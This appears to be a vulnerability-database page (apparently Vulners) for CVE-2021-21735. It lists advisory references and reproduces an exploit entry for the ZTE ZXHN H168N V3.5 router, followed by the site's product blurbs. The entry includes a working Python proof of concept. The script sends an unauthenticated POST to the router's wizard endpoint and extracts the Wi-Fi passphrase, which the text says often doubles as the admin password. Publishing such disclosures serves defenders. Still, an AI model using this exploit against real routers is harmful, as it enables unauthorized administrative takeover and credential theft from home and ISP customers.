| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2021-21735 | 25 May 202619:10 | – | circl | |
| ZTE ZXHN H168N 信息泄露漏洞 | 10 Jun 202100:00 | – | cnnvd | |
| CVE-2021-21735 | 10 Jun 202111:18 | – | cve | |
| CVE-2021-21735 | 10 Jun 202111:18 | – | cvelist | |
| EUVD-2021-8907 | 3 Oct 202520:07 | – | euvd | |
| CVE-2021-21735 | 10 Jun 202112:15 | – | nvd | |
| CVE-2021-21735 | 10 Jun 202112:15 | – | osv | |
| 📄 ZTE ZXHN H168N 3.5 Credential Disclosure | 26 May 202600:00 | – | packetstorm | |
| Design/Logic Flaw | 10 Jun 202112:15 | – | prion | |
| PT-2021-14746 | 10 Jun 202100:00 | – | ptsecurity |
# Title: ZTE ZXHN H168N V3.5 - Unauthenticated Wizard Credential Leak to
Full Admin Compromise
# Date: 2026-05-20
# Author: Mina Nageh Salalma (Monx Research)
# CVE: CVE-2021-21735
# Vendor: ZTE Corporation
# Affected: ZTE ZXHN H168N V3.5
# Category: Remote / Webapps
# Description:
# Unauthenticated POST to the wizard endpoint using GetPassword action
returns
# PPPoE credentials (ADUsername, VDUsername) and WLAN KeyPassphrase. In
# ISP-deployed configurations the Wi-Fi password is also the admin password,
# making this a full admin compromise chain.
#
# MITRE: https://www.cve.org/CVERecord?id=CVE-2021-21735
# Write-up:
https://github.com/minanagehsalalma/cve-2021-21735-zte-zxhn-h168n-admin-compromise
# PoC (single target):
import requests
def check(target):
data = {"IF_ACTION": "GetPassword", "_InstID_PASS":
"DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK"}
r = requests.post(f"http://{target}/", data=data, timeout=10)
import re, html
pw =
re.search(r"<ParaName>KeyPassphrase</ParaName>\s*<ParaValue>(.*?)</ParaValue>",
r.text)
print(f"[+] PSK: {html.unescape(pw.group(1)) if pw else 'not found'}")
if __name__ == "__main__":
import sys
check(sys.argv[1])Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation